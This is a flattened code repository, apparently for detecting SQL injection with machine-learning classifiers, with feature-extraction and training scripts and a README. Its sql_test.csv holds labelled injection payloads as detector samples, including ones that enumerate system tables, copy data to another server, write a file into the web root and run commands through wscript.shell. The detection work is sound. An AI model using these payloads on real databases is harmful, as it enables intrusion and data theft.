94.000000,0.000000,0.265957,0.563830,0.000000,0.000000,0.106383,0.000000 13 | 39.000000,0.000000,0.025641,0.230769,0.000000,0.000000,0.025641,0.000000 14 | 33.000000,0.000000,0.151515,0.515152,0.000000,0.000000,0.090909,0.000000 15 | 591.000000,0.000000,0.115059,0.407783,0.000000,0.003384,0.101523,0.000000 16 | 273.000000,0.000000,0.073260,0.479853,0.000000,0.000000,0.128205,0.000000 17 | 964.000000,0.000000,0.060166,0.409751,0.000000,0.000000,0.099585,0.000000 18 | 358.000000,0.000000,0.083799,0.550279,0.002793,0.000000,0.106145,0.000000 19 | 524.000000,0.000000,0.188931,0.356870,0.000000,0.000000,0.177481,0.000000 20 | 119.000000,0.000000,0.294118,0.218487,0.000000,0.000000,0.159664,0.000000 21 | -------------------------------------------------------------------------------- /ML_for_SQL/data/sql_test.csv: -------------------------------------------------------------------------------- 1 | ; and 1=1 and 1=22.admin adminuser user pass password .. 2 | and 0<>(select count(*) from *) 3 | group by users.id having 1=1-- 4 | group by users.id, users.username, users.password, users.privs having 1=1-- 5 | ; insert into users values( 666, attacker, foobar, 0xffff )-- 6 | UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable- 7 | and user_blank>_name()=dbo-- 8 | and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 9 | ;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;-- 10 | :a or name like fff%;-- ffff。 11 | and 1<>(select count(email) from [user]);-- 12 | ;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- 13 | id=152 and exists(select * from aaa where aaa>5) 14 | insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 15 | table2_blank>table1。IP 16 | insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 17 | HASH_blank>hashsysxlogins。 18 | insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysxlogins) 19 | 1and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin));-- 20 | ;insert dirs exec master.dbo.xp_blank>_dirtree c:\-- 21 | and 0<>(select top 1 paths from dirs)-- 22 | and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- 23 | ;create table dirs1(paths varchar(100), id int)-- 24 | ;insert dirs exec master.dbo.xp_blank>_dirtree e:\web-- 25 | and 0<>(select top 1 paths from dirs1)-- 26 | and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) 27 | and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 。 28 | and 1=(select user_blank>_id from USER_blank>_LOGIN) 29 | and 0=(select user from USER_blank>_LOGIN where user>1) 30 | exec sp_blank>_oacreate wscript.shell, @o out 31 | exec sp_blank>_oamethod @o, run, NULL, notepad.exe 32 | ; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe-- 33 | declare @o int, @f int, @t int, @ret int 34 | declare @line varchar(8000) 35 | exec sp_blank>_oacreate scripting.filesystemobject, @o out 36 | exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 37 | exec @ret = sp_blank>_oamethod @f, readline, @line out 38 | exec sp_blank>_oacreate scripting.filesystemobject, @o out 39 | exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 40 | exec @ret = sp_blank>_oamethod @f, writeline, NULL, 41 | exec sp_blank>_oacreate speech.voicetext, @o out 42 | exec sp_blank>_oamethod @o, register, NULL, foo, bar 43 | exec sp_blank>_oasetproperty @o, speed, 150 44 | exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528waitfor delay 00:00:05 45 | ; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- 46 | 1+and+1=1 47 | ');waitFor+Delay+'00:00:05' 48 | ') or '1'='1-- 49 | OR 1=1 50 | WHERE 1=1 AND 1=1 51 | ORDER BY 1-- 52 | RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' 53 | 54 | -------------------------------------------------------------------------------- /ML_for_SQL/data/sqltest_matrix.csv: -------------------------------------------------------------------------------- 1 | 56.000000,0.000000,0.000000,0.089286,0.160714,0.035714,0.000000,1.000000 2 | 31.000000,0.000000,0.000000,0.032258,0.129032,0.000000,0.000000,1.000000 3 | 30.000000,0.000000,0.000000,0.066667,0.133333,0.033333,0.000000,1.000000 4 | 75.000000,0.000000,0.000000,0.026667,0.093333,0.013333,0.000000,1.000000 5 | 61.000000,0.000000,0.000000,0.065574,0.147541,0.000000,0.000000,1.000000 6 | 112.000000,0.000000,0.508929,0.008929,0.071429,0.008929,0.000000,1.000000 7 | 28.000000,0.000000,0.000000,0.000000,0.035714,0.035714,0.000000,1.000000 8 | 64.000000,0.000000,0.015625,0.031250,0.125000,0.015625,0.000000,1.000000 9 | 62.000000,0.000000,0.000000,0.112903,0.032258,0.000000,0.000000,1.000000 10 | 29.000000,0.000000,0.000000,0.000000,0.172414,0.000000,0.034483,1.000000 11 | 43.000000,0.000000,0.000000,0.023256,0.093023,0.023256,0.000000,1.000000 12 | 107.000000,0.000000,0.000000,0.018692,0.130841,0.037383,0.000000,1.000000 13 | 48.000000,0.000000,0.000000,0.083333,0.145833,0.020833,0.000000,1.000000 14 | 109.000000,0.000000,0.165138,0.045872,0.100917,0.027523,0.000000,1.000000 15 | 22.000000,0.000000,0.090909,0.090909,0.000000,0.000000,0.000000,1.000000 16 | 142.000000,0.000000,0.197183,0.119718,0.063380,0.028169,0.000000,1.000000 17 | 26.000000,0.000000,0.153846,0.000000,0.000000,0.000000,0.000000,1.000000 18 | 124.000000,0.000000,0.225806,0.120968,0.048387,0.032258,0.000000,1.000000 19 | 52.000000,0.000000,0.307692,0.038462,0.038462,0.019231,0.000000,1.000000 20 | 52.000000,0.000000,0.000000,0.000000,0.076923,0.000000,0.000000,1.000000 21 | 39.000000,0.000000,0.000000,0.051282,0.153846,0.000000,0.000000,1.000000 22 | 68.000000,0.000000,0.014706,0.029412,0.147059,0.000000,0.000000,1.000000 23 | 49.000000,0.000000,0.000000,0.081633,0.102041,0.000000,0.000000,1.000000 24 | 55.000000,0.000000,0.000000,0.000000,0.072727,0.000000,0.000000,1.000000 25 | 40.000000,0.000000,0.000000,0.075000,0.150000,0.000000,0.000000,1.000000 26 | 109.000000,0.000000,0.027523,0.055046,0.155963,0.018349,0.000000,1.000000 27 | 93.000000,0.000000,0.118280,0.032258,0.075269,0.010753,0.000000,1.000000 28 | 52.000000,0.000000,0.173077,0.019231,0.076923,0.019231,0.000000,1.000000 29 | 55.000000,0.000000,0.163636,0.036364,0.109091,0.018182,0.000000,1.000000 30 | 45.000000,0.000000,0.000000,0.000000,0.088889,0.000000,0.000000,1.000000 31 | 50.000000,0.000000,0.080000,0.000000,0.100000,0.000000,0.000000,1.000000 32 | 115.000000,0.000000,0.034783,0.000000,0.121739,0.000000,0.000000,1.000000 33 | 40.000000,0.000000,0.000000,0.000000,0.200000,0.000000,0.000000,1.000000 34 | 27.000000,0.000000,0.000000,0.148148,0.074074,0.000000,0.000000,1.000000 35 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000 36 | 64.000000,0.000000,0.000000,0.015625,0.109375,0.000000,0.000000,1.000000 37 | 54.000000,0.000000,0.000000,0.000000,0.129630,0.018519,0.000000,1.000000 38 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000 39 | 81.000000,0.000000,0.000000,0.012346,0.086420,0.000000,0.000000,1.000000 40 | 51.000000,0.000000,0.078431,0.000000,0.117647,0.019608,0.000000,1.000000 41 | 48.000000,0.000000,0.000000,0.000000,0.083333,0.000000,0.000000,1.000000 42 | 52.000000,0.000000,0.076923,0.000000,0.115385,0.000000,0.000000,1.000000 43 | 43.000000,0.000000,0.000000,0.069767,0.093023,0.000000,0.000000,1.000000 44 | 108.000000,0.000000,0.037037,0.083333,0.129630,0.000000,0.000000,1.000000 45 | 284.000000,0.000000,0.028169,0.042254,0.137324,0.000000,0.000000,1.000000 46 | 9.000000,0.000000,0.000000,0.333333,0.000000,0.111111,0.000000,1.000000 47 | 27.000000,0.000000,0.074074,0.222222,0.000000,0.000000,0.000000,1.000000 48 | 14.000000,0.000000,0.000000,0.142857,0.142857,0.071429,0.000000,1.000000 49 | 6.000000,0.000000,0.333333,0.333333,0.166667,0.166667,0.000000,1.000000 50 | 17.000000,0.000000,0.470588,0.235294,0.176471,0.117647,0.000000,1.000000 51 | 12.000000,0.000000,0.583333,0.083333,0.166667,0.000000,0.000000,1.000000 52 | 83.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000 53 | 0.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000 54 | -------------------------------------------------------------------------------- /ML_for_SQL/featurepossess.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF-8 -*- 2 | import re 3 | 4 | def generate(odir,wdir,label): 5 | f_input=open(wdir, 'w') 6 | with open(odir, 'rb') as f: 7 | data = [x.decode('utf-8').strip() for x in f.readlines()] 8 | #print(data) 9 | line_number=0 10 | 11 | for line in data: 12 | global feature 13 | num_len=0 14 | capital_len=0 15 | key_num=0 16 | feature3=0 17 | line_number=line_number+1 18 | num_len=len(re.compile(r'\d').findall(line)) 19 | if len(line)!=0: 20 | num_f=num_len/len(line)#数字字符频率 21 | capital_len=len(re.compile(r'[A-Z]').findall(line)) 22 | if len(line)!=0: 23 | capital_f=capital_len/len(line)#大写字母频率 24 | line=line.lower() 25 | 26 | key_num=line.count('and%20')+line.count('or%20')+line.count('xor%20')+line.count('sysobjects%20')+line.count('version%20')+line.count('substr%20')+line.count('len%20')+line.count('substring%20')+line.count('exists%20') 27 | key_num=key_num+line.count('mid%20')+line.count('asc%20')+line.count('inner join%20')+line.count('xp_cmdshell%20')+line.count('version%20')+line.count('exec%20')+line.count('having%20')+line.count('unnion%20')+line.count('order%20')+line.count('information schema') 28 | key_num=key_num+line.count('load_file%20')+line.count('load data infile%20')+line.count('into outfile%20')+line.count('into dumpfile%20') 29 | if len(line)!=0: 30 | space_f=(line.count(" ")+line.count("%20"))/len(line)#空格百分比 31 | special_f=(line.count("{")*2+line.count('28%')*2+line.count('NULL')+line.count('[')+line.count('=')+line.count('?'))/len(line) 32 | prefix_f=(line.count('\\x')+line.count('&')+line.count('\\u')+line.count('%'))/len(line) 33 | #print('%f,%f,%f,%f,%f,%f,%f,%f' % (len(line),key_num,capital_f,num_f,space_f,special_f,prefix_f,label)) 34 | 35 | f_input.write('%f,%f,%f,%f,%f,%f,%f,%f' % (len(line),key_num,capital_f,num_f,space_f,special_f,prefix_f,label)+'\n') 36 | 37 | f_input.close() 38 | return wdir 39 | -------------------------------------------------------------------------------- /ML_for_SQL/file/Adaboost.model: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/Adaboost.model -------------------------------------------------------------------------------- /ML_for_SQL/file/GBDT.model: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/GBDT.model -------------------------------------------------------------------------------- /ML_for_SQL/file/bys.model: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/bys.model -------------------------------------------------------------------------------- /ML_for_SQL/file/forestrandom.model: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/forestrandom.model -------------------------------------------------------------------------------- /ML_for_SQL/file/knn.model: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/knn.model -------------------------------------------------------------------------------- /ML_for_SQL/file/lg.model: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/lg.model -------------------------------------------------------------------------------- /ML_for_SQL/file/svm.model: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/svm.model -------------------------------------------------------------------------------- /ML_for_SQL/file/tree.model: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/tree.model -------------------------------------------------------------------------------- /ML_for_SQL/sqlbys.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Created on Mon Nov 20 19:06:57 2017 4 | 5 | @author: wf 6 | """ 7 | import numpy as np 8 | import pandas as pd 9 | from sklearn import metrics 10 | from sklearn.naive_bayes import GaussianNB 11 | from sklearn.model_selection import train_test_split 12 | from featurepossess import generate 13 | from sklearn.externals import joblib 14 | 15 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1) 16 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0) 17 | 18 | df = pd.read_csv(sql_matrix) 19 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False) 20 | df = pd.read_csv( nor_matrix) 21 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+') 22 | 23 | feature_max = pd.read_csv('./data/all_matrix.csv') 24 | arr=feature_max.values 25 | data = np.delete(arr, -1, axis=1) #删除最后一列 26 | #print(arr) 27 | target=arr[:,7] 28 | #随机划分训练集和测试集 29 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3) 30 | #模型 31 | clf=GaussianNB()#创建分类器对象, 32 | clf.fit(train_data,train_target)#训练模型 33 | joblib.dump(clf, './file/bys.model') 34 | print("forestrandom.model has been saved to 'file/bys.model'") 35 | #clf = joblib.load('svm.model') 36 | y_pred=clf.predict(test_data)#预测 37 | print("y_pred:%s"%y_pred) 38 | print("test_target:%s"%test_target) 39 | #Verify 40 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率 41 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率 42 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /ML_for_SQL/sqlforestrandom.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Created on Mon Nov 20 19:06:57 2017 4 | 5 | @author: wf 6 | """ 7 | import numpy as np 8 | import pandas as pd 9 | import matplotlib.pyplot as plt 10 | from sklearn import metrics 11 | from sklearn.ensemble import RandomForestClassifier 12 | from sklearn.model_selection import train_test_split 13 | from featurepossess import generate 14 | from sklearn.externals import joblib 15 | 16 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1) 17 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0) 18 | 19 | df = pd.read_csv(sql_matrix) 20 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False) 21 | df = pd.read_csv( nor_matrix) 22 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+') 23 | 24 | feature_max = pd.read_csv('./data/all_matrix.csv') 25 | arr=feature_max.values 26 | data = np.delete(arr, -1, axis=1) #删除最后一列 27 | #print(arr) 28 | target=arr[:,7] 29 | #随机划分训练集和测试集 30 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3) 31 | #模型 32 | clf = RandomForestClassifier(n_estimators=10,max_depth=2)#创建分类器对象, 33 | clf.fit(train_data,train_target)#训练模型 34 | joblib.dump(clf, './file/forestrandom.model') 35 | print("forestrandom.model has been saved to 'file/forestrandom.model'") 36 | #clf = joblib.load('svm.model') 37 | y_pred=clf.predict(test_data)#预测 38 | print("y_pred:%s"%y_pred) 39 | print("test_target:%s"%test_target) 40 | #Verify 41 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率 42 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率 43 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /ML_for_SQL/sqlkNN.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Created on Mon Nov 20 19:06:57 2017 4 | 5 | @author: wf 6 | """ 7 | import numpy as np 8 | import pandas as pd 9 | import matplotlib.pyplot as plt 10 | from sklearn import metrics 11 | from sklearn import neighbors 12 | from sklearn.model_selection import train_test_split 13 | from featurepossess import generate 14 | from sklearn.externals import joblib 15 | 16 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1) 17 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0) 18 | 19 | df = pd.read_csv(sql_matrix) 20 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False) 21 | df = pd.read_csv( nor_matrix) 22 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+') 23 | 24 | feature_max = pd.read_csv('./data/all_matrix.csv') 25 | arr=feature_max.values 26 | data = np.delete(arr, -1, axis=1) #删除最后一列 27 | #print(arr) 28 | target=arr[:,7] 29 | #随机划分训练集和测试集 30 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3) 31 | #模型 32 | clf=neighbors.KNeighborsClassifier(algorithm='ball_tree')#创建分类器对象, 33 | clf.fit(train_data,train_target)#训练模型 34 | joblib.dump(clf, './file/knn.model') 35 | print("forestrandom.model has been saved to 'file/knn.model'") 36 | #clf = joblib.load('svm.model') 37 | y_pred=clf.predict(test_data)#预测 38 | print("y_pred:%s"%y_pred) 39 | print("test_target:%s"%test_target) 40 | #Verify 41 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率 42 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率 43 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /ML_for_SQL/sqllogistic.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Created on Mon Nov 20 19:06:57 2017 4 | 5 | @author: wf 6 | """ 7 | import numpy as np 8 | import pandas as pd 9 | from sklearn import metrics 10 | from sklearn.linear_model import LogisticRegression 11 | from sklearn.model_selection import train_test_split 12 | from featurepossess import generate 13 | from sklearn.externals import joblib 14 | 15 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1) 16 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0) 17 | 18 | df = pd.read_csv(sql_matrix) 19 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False) 20 | df = pd.read_csv( nor_matrix) 21 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+') 22 | 23 | feature_max = pd.read_csv('./data/all_matrix.csv') 24 | arr=feature_max.values 25 | data = np.delete(arr, -1, axis=1) #删除最后一列 26 | #print(arr) 27 | target=arr[:,7] 28 | #随机划分训练集和测试集 29 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3) 30 | #模型 31 | clf=LogisticRegression()#创建分类器对象, 32 | clf.fit(train_data,train_target)#训练模型 33 | joblib.dump(clf, './file/lg.model') 34 | print("forestrandom.model has been saved to 'file/lg.model'") 35 | #clf = joblib.load('svm.model') 36 | y_pred=clf.predict(test_data)#预测 37 | print("y_pred:%s"%y_pred) 38 | print("test_target:%s"%test_target) 39 | #Verify 40 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率 41 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率 42 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /ML_for_SQL/sqlsvm.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Created on Mon Oct 30 20:00:50 2017 4 | 5 | @author: wf 6 | """ 7 | import numpy as np 8 | import pandas as pd 9 | import matplotlib.pyplot as plt 10 | from sklearn import metrics 11 | from sklearn.svm import SVC 12 | from sklearn.model_selection import train_test_split 13 | from featurepossess import generate 14 | from sklearn.externals import joblib 15 | 16 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1) 17 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0) 18 | 19 | df = pd.read_csv(sql_matrix) 20 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False) 21 | df = pd.read_csv( nor_matrix) 22 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+') 23 | 24 | # with open('sql_matrix', 'ab') as f: 25 | # f.write(open('nor_matrix', 'rb').read()) 26 | feature_max = pd.read_csv('./data/all_matrix.csv') 27 | arr=feature_max.values 28 | data = np.delete(arr, -1, axis=1) #删除最后一列 29 | #print(arr) 30 | target=arr[:,7] 31 | #随机划分训练集和测试集 32 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=8) 33 | clf = SVC(kernel='rbf')#创建分类器对象,采用概率估计,默认为False 34 | clf.fit(train_data, train_target)#用训练数据拟合分类器模型 35 | joblib.dump(clf, './file/svm.model') 36 | print("svm.model has been saved to 'file/svm.model'") 37 | #clf = joblib.load('svm.model') 38 | y_pred=clf.predict(test_data)#预测 39 | print("y_pred:%s"%y_pred) 40 | print("test_target:%s"%test_target) 41 | #Verify 42 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率 43 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率 44 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵 45 | #print('F1:%.3f' %metrics.f1_score(y_true=test_target,y_pred=y_pred))#F1度量 46 | #fpr,tpr,thresholds=metrics.roc_curve(y_true=test_target,y_score=y_pred) 47 | #print(fpr,tpr,thresholds) 48 | #print('auc:%.3f' %metrics.auc(fpr,tpr)) 49 | #print('auc:%.3f' %metrics.roc_auc_score(y_true=test_target,y_score=y_pred)) 50 | #plt.figure(1) 51 | #plt.axis([0,1,0,1])#设置横轴纵轴最大坐标 52 | #plt.plot([0,1],[0,1],'k--')#绘制对角线曲线 53 | #plt.plot(fpr,tpr,label='ROCcurve')#有问题,只有3个点 54 | #plt.xlabel('False positive rate')#x轴标签 55 | #plt.ylabel('True positive rate')#y轴标签 56 | #plt.title('ROC curve') 57 | #plt.legend(loc='best')#生成图例 58 | #plt.show()#显示图形 59 | -------------------------------------------------------------------------------- /ML_for_SQL/sqltree.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Created on Tue Nov 7 14:40:05 2017 4 | 5 | @author: wf 6 | """ 7 | import numpy as np 8 | import pandas as pd 9 | import matplotlib.pyplot as plt 10 | from sklearn import metrics 11 | from sklearn import tree 12 | from sklearn.model_selection import train_test_split 13 | from featurepossess import generate 14 | from sklearn.externals import joblib 15 | 16 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1) 17 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0) 18 | 19 | df = pd.read_csv(sql_matrix) 20 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False) 21 | df = pd.read_csv( nor_matrix) 22 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+') 23 | 24 | # with open('sql_matrix', 'ab') as f: 25 | # f.write(open('nor_matrix', 'rb').read()) 26 | feature_max = pd.read_csv('./data/all_matrix.csv') 27 | arr=feature_max.values 28 | data = np.delete(arr, -1, axis=1) #删除最后一列 29 | #print(arr) 30 | target=arr[:,7] 31 | #随机划分训练集和测试集 32 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3) 33 | #模型 34 | clf=tree.DecisionTreeClassifier(criterion="entropy",max_depth=1) 35 | clf.fit(train_data,train_target)#训练模型 36 | joblib.dump(clf, './file/tree.model') 37 | print("tree.model has been saved to 'file/tree.model'") 38 | #clf = joblib.load('svm.model') 39 | y_pred=clf.predict(test_data)#预测 40 | print("y_pred:%s"%y_pred) 41 | print("test_target:%s"%test_target) 42 | #Verify 43 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率 44 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率 45 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵 46 | 47 | -------------------------------------------------------------------------------- /ML_for_SQL/testsql.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Created on Mon Oct 30 20:00:50 2017 4 | 5 | @author: wf 6 | """ 7 | import numpy as np 8 | import pandas as pd 9 | import matplotlib.pyplot as plt 10 | from sklearn import metrics 11 | from sklearn.svm import SVC 12 | from sklearn.model_selection import train_test_split 13 | from featurepossess import generate 14 | from sklearn.externals import joblib 15 | 16 | def test_c(flag,sql_flag): 17 | sql_dir = "./data/sql_test.csv" 18 | nor_dir = "./data/normal_test.csv" 19 | allm_dir = "./data/alltest_matrix.csv" 20 | if flag=='1' and sql_flag=='0': 21 | nor_matrix = generate(nor_dir, "./data/nor_matrix.csv", 0) 22 | return nor_matrix 23 | elif flag=='1' and sql_flag=='1': 24 | sql_matrix = generate(sql_dir, "./data/sqltest_matrix.csv", 1) 25 | return sql_matrix 26 | else: 27 | sql_matrix=generate(sql_dir,"./data/sqltest_matrix.csv",1) 28 | nor_matrix=generate(nor_dir,"./data/nortest_matrix.csv",0) 29 | df = pd.read_csv(sql_matrix) 30 | df.to_csv(allm_dir,encoding="utf_8_sig",index=False) 31 | df = pd.read_csv( nor_matrix) 32 | df.to_csv(allm_dir,encoding="utf_8_sig",index=False, header=False, mode='a+') 33 | return allm_dir 34 | def test_data(allm_dir): 35 | feature_max = pd.read_csv(allm_dir) 36 | arr=feature_max.values 37 | test_data = np.delete(arr, -1, axis=1) #删除最后一列 38 | #print(arr) 39 | test_target=arr[:,7] 40 | return test_data,test_target 41 | 42 | if __name__=="__main__": 43 | while(1): 44 | model_name=input("请输入要选择的模型名称:") 45 | clf = joblib.load('./file/'+model_name) 46 | print(model_name," has been loaded") 47 | flag=input("请输入测试文件个数:") 48 | sql_flag=input("请输入样本类型:") 49 | mode=test_c(flag,sql_flag) 50 | test_data,test_target=test_data(mode) 51 | y_pred=clf.predict(test_data)#预测 52 | print("y_pred:%s"%y_pred) 53 | print("test_target:%s"%test_target) 54 | #Verify 55 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率 56 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率 57 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵 58 | 59 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ML-for-SQL-Injection 2 | 机器学习检测SQL注入 3 | 4 | 本项目是使用机器学习算法来分类SQL注入语句与正常语句: 5 | 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。 6 | data是收集的样本数据 7 | file中存放的是训练好的各个模型 8 | featurepossess.py是对原始样本进行预处理,提特征。 9 | sqlsvm.py等py文件是训练模型 10 | testsql是对训练好的模型进行测试,用准确率来度量模型效果。 11 | --------------------------------------------------------------------------------